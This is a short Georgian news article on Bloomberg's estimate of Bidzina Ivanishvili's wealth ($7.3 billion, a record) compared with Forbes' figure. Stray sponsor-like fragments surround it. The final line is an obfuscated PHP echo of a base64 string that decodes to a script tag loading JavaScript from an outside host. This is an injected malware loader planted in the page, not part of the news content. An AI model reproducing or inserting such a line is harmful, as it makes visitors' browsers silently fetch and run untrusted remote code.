celsiusi
ავერსი საქკაბელი

Bloomberg-ის მილიარდერების ინდექსის მიხედვით, „ქართული ოცნების" დამფუძნებლის, ბიძინა ივანიშვილის ქონება ახალ რეკორდულ მაჩვენებლამდე გაიზარდა და 7.3 მილიარდ დოლარს შეადგენს. ამ შედეგით ივანიშვილი მსოფლიოს 500 უმდიდრეს ადამიანს შორის 369-ე ადგილზეა.

საქართველოს უმდიდრესი მოქალაქის ქონების შეფასება წლიურ ჭრილში 700 მილიონი დოლარით, ანუ 10.6%-ით არის მომატებული.

Bloomberg-ის მილიარდერების ინდექსი ივანიშვილის ქონებას 2013 წლიდან აფასებს. საწყისი მაჩვენებელი 6.33 მლრდ დოლარი იყო. ყველაზე დაბალ ნიშნულს, 4.95 მლრდ დოლარს, 2020 წელს მიაღწია, უმაღლესი შეფასება კი ამჟამად ფიქსირდება.

Bloomberg-ისგან განსხვავებით, უცვლელია ბიძინა ივანიშვილის ქონების შეფასება Forbes-ის რეიტინგში და 4.9 მილიარდი დოლარს შეადგენს. ამასთან, Forbes-ის რეიტინგში მიხეილ ლომთაძის ქონება 5.8 მილიარდ დოლარადაა შეფასებული.

137
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");